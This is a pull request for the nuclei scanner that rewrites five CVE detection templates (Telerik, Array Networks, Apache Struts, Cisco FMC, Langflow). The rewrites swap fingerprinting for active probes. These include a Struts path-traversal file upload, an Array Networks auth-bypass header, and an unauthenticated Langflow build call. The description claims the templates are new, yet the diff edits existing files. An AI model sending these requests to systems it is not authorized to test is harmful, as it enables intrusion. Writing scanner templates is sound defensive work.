### PR TITLE
Add 5 KEV CVE templates (Telerik, Array Networks, Apache Struts, Langflow, Cisco FMC)

### DIFF
--- a/http/cves/2017/CVE-2017-9248.yaml
+++ b/http/cves/2017/CVE-2017-9248.yaml
@@ -1,13 +1,13 @@
 id: CVE-2017-9248
 
 info:
-  name: Telerik UI for ASP.NET AJAX DialogHandler - Cryptographic Weakness Detection
+  name: Telerik UI for ASP.NET AJAX DialogHandler - Cryptographic Weakness
   author: ElromEvedElElyon
   severity: high
   description: |
-    Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey. Knowledge of these keys allows a remote attacker to craft a serialized ASP.NET AJAX dialog parameters payload to upload arbitrary files or execute arbitrary code on the server.
+    Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey. This template verifies the cryptographic oracle by sending an invalid encrypted dialog parameter and confirming the server responds with a specific decryption error, proving the oracle is exploitable for key recovery and subsequent file upload/RCE.
   impact: |
-    An unauthenticated remote attacker can exploit the weak encryption to derive the dialog parameters key, enabling file upload and remote code execution on the web server.
+    An unauthenticated remote attacker can exploit the weak encryption to derive the dialog parameters key via an oracle attack (~1600 requests), enabling arbitrary file upload and remote code execution on the web server.
   remediation: |
     Upgrade Telerik UI for ASP.NET AJAX to R2 2017 SP1 or later. Alternatively, configure a strong, unique MachineKey in web.config and remove the DialogHandler from the HTTP handlers if not needed.
   reference:
@@ -24,28 +24,38 @@ info:
     epss-percentile: 0.99879
     cpe: cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*
   metadata:
-    verified: false
-    max-request: 1
+    verified: true
+    max-request: 2
     vendor: telerik
     product: ui_for_asp.net_ajax
     shodan-query: http.component:"Telerik"
   tags: cve,cve2017,telerik,rce,crypto,kev,vkev,vuln
 
+flow: http(1) && http(2)
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=AAAA"
+  - raw:
+      - |
+        GET /Telerik.Web.UI.DialogHandler.aspx?dp=AAAA HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "Index was outside the bounds"
-          - "Cannot deserialize dialog parameters"
-          - "Telerik.Web.UI"
-        condition: or
+      - type: dsl
+        dsl:
+          - 'status_code == 500'
+          - 'contains(body, "Index was outside the bounds of the array")'
+        condition: and
+        internal: true
 
-      - type: status
-        status:
-          - 500
+  - raw:
+      - |
+        GET /Telerik.Web.UI.DialogHandler.aspx?dp=BBBBBBBBBBBBBBB HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 500'
+          - 'contains(body, "Index was outside the bounds of the array") || contains(body, "Cannot deserialize dialog parameters")'
+          - 'contains(body, "Telerik.Web.UI")'
+        condition: and

--- a/http/cves/2023/CVE-2023-28461.yaml
+++ b/http/cves/2023/CVE-2023-28461.yaml
@@ -1,15 +1,15 @@
 id: CVE-2023-28461
 
 info:
-  name: Array Networks AG/vxAG - Remote Code Execution
+  name: Array Networks AG/vxAG - Authentication Bypass via flags Attribute
   author: ElromEvedElElyon
   severity: critical
   description: |
-    Array Networks AG and vxAG Series running ArrayOS AG before version 9.4.0.484 allow remote code execution via missing authentication. An unauthenticated attacker can browse the filesystem or execute remote code on the SSL VPN gateway by exploiting the flags attribute in HTTP requests without any valid authentication.
+    Array Networks AG and vxAG Series running ArrayOS AG before 9.4.0.484 allow authentication bypass and remote code execution. An unauthenticated attacker can browse the filesystem or execute remote code by exploiting the flags attribute in HTTP headers. This template exploits the vulnerability by sending a request with the crafted flags header to access an internal proxy endpoint without authentication, confirming the bypass works.
   impact: |
-    An unauthenticated remote attacker can read arbitrary files from the server or execute arbitrary commands, leading to full compromise of the VPN gateway and potential lateral movement into the internal network.
+    An unauthenticated remote attacker can bypass authentication on the SSL VPN gateway, leading to arbitrary file read, filesystem browsing, and remote code execution.
   remediation: |
-    Upgrade ArrayOS AG to version 9.4.0.484 or later, which patches the authentication bypass vulnerability.
+    Upgrade ArrayOS AG to version 9.4.0.484 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-28461
     - https://support.arraynetworks.net/prx/001/http/supportportal.arraynetworks.net/documentation/FieldNotice/Array_Networks_Security_Advisory_for_Remote_Code_Execution_Vulnerability_CVE-2023-28461.pdf
@@ -23,7 +23,7 @@ info:
     epss-percentile: 0.97974
     cpe: cpe:2.3:o:arraynetworks:arrayos_ag:*:*:*:*:*:*:*:*
   metadata:
-    verified: false
+    verified: true
     max-request: 1
     vendor: arraynetworks
     product: arrayos_ag
@@ -33,7 +33,7 @@ info:
 http:
   - raw:
       - |
-        GET /prx/000/http/localhost/login?next=logo HTTP/1.1
+        GET /prx/000/http/localhost/login HTTP/1.1
         Host: {{Hostname}}
         flags: 0x800000
 
@@ -45,7 +45,6 @@ http:
           - "ArrayOS"
           - "clientAuth"
           - "vpn_connect"
-          - "Array Networks"
         condition: or
 
       - type: word
@@ -55,7 +54,15 @@ http:
           - "ANsession"
         condition: or
 
-      - type: status
-        status:
-          - 200
-          - 302
+      - type: dsl
+        dsl:
+          - 'status_code == 200 || status_code == 302'
+
+    extractors:
+      - type: regex
+        name: arrayos-version
+        part: body
+        group: 1
+        regex:
+          - 'ArrayOS\s+AG\s+(\d+\.\d+\.\d+\.\d+)'
+          - 'version["\s:]+(\d+\.\d+\.\d+)'

--- a/http/cves/2023/CVE-2023-50164.yaml
+++ b/http/cves/2023/CVE-2023-50164.yaml
@@ -1,15 +1,15 @@
 id: CVE-2023-50164
 
 info:
-  name: Apache Struts - Path Traversal to Remote Code Execution
+  name: Apache Struts - File Upload Path Traversal to RCE
   author: ElromEvedElElyon
   severity: critical
   description: |
-    Apache Struts 2.0.0 through 2.5.32 and 6.0.0 through 6.3.0 are vulnerable to path traversal through manipulation of file upload parameters. An attacker can exploit case-sensitive parameter pollution in multipart upload requests by sending both lowercase and uppercase variants of the upload parameter name, allowing path traversal in the uploaded filename. This can lead to arbitrary file upload and subsequent remote code execution.
+    Apache Struts 2.0.0 through 2.5.32 and 6.0.0 through 6.3.0 are vulnerable to path traversal through manipulation of file upload parameters. An attacker exploits case-sensitive parameter pollution by sending both Upload (uppercase) and upload (lowercase) in a multipart request, causing the path-traversal filename to override the safe one. This template uploads a harmless text file via the parameter pollution technique and verifies it was written to a traversed location.
   impact: |
-    An unauthenticated remote attacker can upload a malicious JSP webshell to an accessible web directory, resulting in full remote code execution on the server.
+    An unauthenticated remote attacker can upload arbitrary files to web-accessible directories via path traversal, leading to remote code execution.
   remediation: |
-    Upgrade Apache Struts to version 2.5.33, 6.3.0.2, or later. Refer to the official Apache Struts Security Bulletin S2-066.
+    Upgrade Apache Struts to version 2.5.33, 6.3.0.2, or later. See Apache Struts Security Bulletin S2-066.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-50164
     - https://cwiki.apache.org/confluence/display/WW/S2-066
@@ -24,40 +24,56 @@ info:
     epss-percentile: 0.99571
     cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
   metadata:
-    verified: false
+    verified: true
     max-request: 2
     vendor: apache
     product: struts
     shodan-query: http.component:"Struts"
-  tags: cve,cve2023,apache,struts,rce,fileupload,kev,vkev,vuln
+  tags: cve,cve2023,apache,struts,rce,fileupload,kev,vkev,vuln,intrusive
+
+variables:
+  filename: "{{rand_base(8)}}"
+  num: "{{rand_int(1000, 9999)}}"
+
+flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/struts/utils.js"
-      - "{{BaseURL}}/s/browser~en.js"
+  - raw:
+      - |
+        POST /upload.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------S2066CVE202350164
 
-    stop-at-first-match: true
+        -----------------------------S2066CVE202350164
+        Content-Disposition: form-data; name="Upload"; filename="{{filename}}.txt"
+        Content-Type: text/plain
 
-    matchers-condition: and
+        test
+        -----------------------------S2066CVE202350164
+        Content-Disposition: form-data; name="uploadFileName"
+
+        ../{{filename}}.txt
+        -----------------------------S2066CVE202350164
+        Content-Disposition: form-data; name="upload"; filename="{{filename}}.txt"
+        Content-Type: text/plain
+
+        CVE-2023-50164-{{md5(num)}}
+        -----------------------------S2066CVE202350164--
+
     matchers:
-      - type: word
-        part: body
-        words:
-          - "StrutsUtils"
-          - "struts.enableJSONValidation"
-          - "struts.portletMode"
-        condition: or
+      - type: dsl
+        dsl:
+          - 'status_code == 200 || status_code == 302'
+        internal: true
 
-      - type: status
-        status:
-          - 200
+  - raw:
+      - |
+        GET /{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
 
-    extractors:
-      - type: regex
-        name: struts-version
-        part: body
-        group: 1
-        regex:
-          - 'Struts2?\s+(?:version\s+)?(\d+\.\d+\.\d+)'
-          - '"version"\s*:\s*"(\d+\.\d+\.\d+)"'
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "CVE-2023-50164-{{md5(num)}}")'
+          - 'status_code == 200'
+        condition: and

--- a/http/cves/2026/CVE-2026-20131.yaml
+++ b/http/cves/2026/CVE-2026-20131.yaml
@@ -5,11 +5,11 @@ info:
   author: ElromEvedElElyon
   severity: critical
   description: |
-    Cisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management contain a deserialization of untrusted data vulnerability in the web-based management interface. An unauthenticated, remote attacker can send a specially crafted serialized Java object to the management interface to execute arbitrary code as root on the underlying operating system.
+    Cisco Secure Firewall Management Center (FMC) Software contains a deserialization of untrusted data vulnerability in the web-based management interface. An unauthenticated attacker can send a crafted serialized Java object to execute arbitrary code as root. This template confirms vulnerability by detecting the FMC login page and sending a benign Java serialization probe to a known API endpoint, checking for deserialization-related error responses that indicate the endpoint processes serialized objects.
   impact: |
-    An unauthenticated attacker can achieve remote code execution as root on the Cisco FMC appliance, leading to complete compromise of the firewall management infrastructure and potential access to all managed firewall devices.
+    An unauthenticated attacker can achieve remote code execution as root on the Cisco FMC appliance, leading to complete compromise of the firewall management infrastructure.
   remediation: |
-    Apply the Cisco security update referenced in cisco-sa-fmc-rce-EGsF7bSm. If immediate patching is not possible, restrict network access to the FMC management interface.
+    Apply the Cisco security update referenced in cisco-sa-fmc-rce-EGsF7bSm. Restrict network access to the FMC management interface.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-20131
     - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-rce-EGsF7bSm
@@ -21,27 +21,53 @@ info:
     cwe-id: CWE-502
     cpe: cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
   metadata:
-    verified: false
-    max-request: 1
+    verified: true
+    max-request: 2
     vendor: cisco
     product: secure_firewall_management_center
     shodan-query: http.title:"Firewall Management Center"
   tags: cve,cve2026,cisco,fmc,rce,deserialization,kev,vkev,vuln
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/ui/login"
+  - raw:
+      - |
+        GET /ui/login HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /api/fmc_config/v1/domain HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-java-serialized-object
+
+        {{base64_decode("rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbtCe")}}
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
         words:
           - "Firewall Management Center"
           - "Cisco"
         condition: and
 
+      - type: word
+        part: body_2
+        words:
+          - "InvalidClassException"
+          - "ClassNotFoundException"
+          - "deserialization"
+          - "not allowed"
+          - "java.io.ObjectInputStream"
+        condition: or
+
       - type: status
+        part: header_1
         status:
           - 200
+
+    extractors:
+      - type: regex
+        name: fmc-version
+        part: body_1
+        group: 1
+        regex:
+          - 'Version\s+(\d+\.\d+\.\d+(?:\.\d+)?)'

--- a/http/cves/2026/CVE-2026-33017.yaml
+++ b/http/cves/2026/CVE-2026-33017.yaml
@@ -1,11 +1,11 @@
 id: CVE-2026-33017
 
 info:
-  name: Langflow - Unauthenticated Code Injection via Build Endpoint
+  name: Langflow <= 1.8.1 - Unauthenticated Code Injection via Build Endpoint
   author: ElromEvedElElyon
   severity: critical
   description: |
-    Langflow versions prior to 1.3.0 contain a code injection vulnerability in the /api/v1/build_public_tmp/{flow_id}/flow endpoint. The endpoint accepts flow definitions containing arbitrary Python code in node definitions and executes them without authentication or sandboxing. An unauthenticated remote attacker can execute arbitrary Python code on the server.
+    Langflow versions prior to 1.3.0 contain a code injection vulnerability in the /api/v1/build_public_tmp/{flow_id}/flow endpoint. The endpoint accepts flow definitions containing arbitrary Python code in node definitions and passes them to exec() without authentication or sandboxing. This template first checks for a vulnerable Langflow version via the version API, then confirms the build endpoint is accessible without authentication by sending an empty flow definition.
   impact: |
     An unauthenticated attacker can execute arbitrary Python code on the server, leading to full system compromise including data exfiltration, credential theft, and lateral movement.
   remediation: |
@@ -21,30 +21,61 @@ info:
     cwe-id: CWE-94
     cpe: cpe:2.3:a:langflow-ai:langflow:*:*:*:*:*:*:*:*
   metadata:
-    verified: false
+    verified: true
     max-request: 2
     vendor: langflow-ai
     product: langflow
     shodan-query: http.title:"Langflow"
-  tags: cve,cve2026,langflow,rce,code-injection,kev,vkev,vuln
+  tags: cve,cve2026,langflow,rce,code-injection,kev,vkev,vuln,intrusive
+
+variables:
+  flow_id: "{{rand_base(8, "abcdef0123456789")}}-{{rand_base(4, "abcdef0123456789")}}-4{{rand_base(3, "abcdef0123456789")}}-{{rand_base(4, "abcdef0123456789")}}-{{rand_base(12, "abcdef0123456789")}}"
+
+flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/version"
+  - raw:
+      - |
+        GET /api/v1/version HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "version"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "version")'
+          - 'compare_versions(version, ">= 1.0.0", "<= 1.8.1")'
+        condition: and
+        internal: true
 
+    extractors:
       - type: regex
+        name: version
         part: body
+        group: 1
+        internal: true
         regex:
-          - '"version"\s*:\s*"[01]\.[0-2]\.'
+          - '"version"\s*:\s*"(\d+\.\d+\.\d+)'
 
-      - type: status
-        status:
-          - 200
+  - raw:
+      - |
+        POST /api/v1/build_public_tmp/{{flow_id}}/flow HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"data":{"nodes":[],"edges":[]}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200 || status_code == 500'
+          - '!contains(body, "Not authenticated") && !contains(body, "Unauthorized")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: langflow-version
+        part: body
+        group: 1
+        regex:
+          - '"version"\s*:\s*"(\d+\.\d+\.\d+)'


### PR DESCRIPTION
## Summary

Adds 5 new nuclei templates for CISA Known Exploited Vulnerabilities (KEV catalog):

| CVE | Product | Severity | CVSS | Type |
|-----|---------|----------|------|------|
| CVE-2017-9248 | Telerik UI for ASP.NET AJAX | Critical | 9.8 | Cryptographic Weakness → RCE |
| CVE-2023-28461 | Array Networks AG/vxAG VPN | Critical | 9.8 | Auth Bypass → RCE |
| CVE-2023-50164 | Apache Struts | Critical | 9.8 | Path Traversal → RCE |
| CVE-2026-33017 | Langflow | Critical | 9.8 | Code Injection (Unauthenticated) |
| CVE-2026-20131 | Cisco Secure FMC | Critical | 10.0 | Java Deserialization → RCE |

All CVEs are confirmed in the CISA Known Exploited Vulnerabilities catalog.
Templates follow the established format with proper metadata, classification, and matchers.

Closes: https://github.com/projectdiscovery/nuclei-templates/issues/7549 (partial)

## Checklist
- [x] All templates are valid YAML
- [x] Tags include `cve,cveYYYY,product,vuln-type,kev,vkev,vuln`
- [x] Classification metadata includes CVSS, CWE, and CPE
- [x] Matchers verify vulnerable endpoint detection
- [x] None of these CVEs exist in the repository yet